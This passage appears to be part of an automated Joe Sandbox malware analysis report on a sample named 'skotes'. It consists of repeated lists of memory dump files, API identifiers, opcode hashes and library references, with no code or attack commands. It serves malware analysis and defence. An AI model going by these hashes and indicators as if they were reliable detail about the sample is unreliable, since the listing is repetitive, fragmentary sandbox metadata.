                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: eventObject
                                                                                                                                                                                                                                          • API String ID: 1288476792-1680012138
                                                                                                                                                                                                                                          • Opcode ID: 59ae8581583fbbb54e1a2167129bf066e80fcba9fb28f7e2996b31a0982431f3
                                                                                                                                                                                                                                          • Instruction ID: 3525c47e26220d2788bc342d4f5d6580deed2f52fa15239073944f4bc4102fb7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59ae8581583fbbb54e1a2167129bf066e80fcba9fb28f7e2996b31a0982431f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A11C275940604E6DF24EAA8CD86FEE77E85F01744F2046A9B514E60E1DBB0EA04C665
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00B9A102
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00B9A126
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B9A139
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: pScheduler
                                                                                                                                                                                                                                          • API String ID: 246774199-923244539
                                                                                                                                                                                                                                          • Opcode ID: 3b515c749ac26429eab911f8cdaa07bd1f3a6da302aeefc5b5e3428602947876
                                                                                                                                                                                                                                          • Instruction ID: d1b786fd5c10721cb5eaf9a1d0ba5ab175a3b72f32803c8d1a97bb0f514b4d72
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b515c749ac26429eab911f8cdaa07bd1f3a6da302aeefc5b5e3428602947876
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BF05936A00214A7CF20FA54DC83C9EB7F89E82B10B1081FDE40533291DF70AE05C6E2
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                          • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                                                                          • Instruction ID: aa4686e9587e7ded220a5291786af77e32d18c311b138c076df228285fc14472
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EB104329086859FDB15CF28C8817BEBFE5EF56350F1481FAE855EB242D6349D01CBA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __alloca_probe_16__freea
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1635606685-0
                                                                                                                                                                                                                                          • Opcode ID: 11ef97b9a8b88ebf45192f67876bef373fa206d2083e20f23fb48847c8afd5b6
                                                                                                                                                                                                                                          • Instruction ID: 90802b877fe9dc56c26a5a2dec83417fa07b9f38e859d4ef9d490dd1cb87d0a4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11ef97b9a8b88ebf45192f67876bef373fa206d2083e20f23fb48847c8afd5b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0781A072D002499BDF219EA58C81EFE7BE5EF49314F1941E6E854B7281E7B9CC40CBA0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
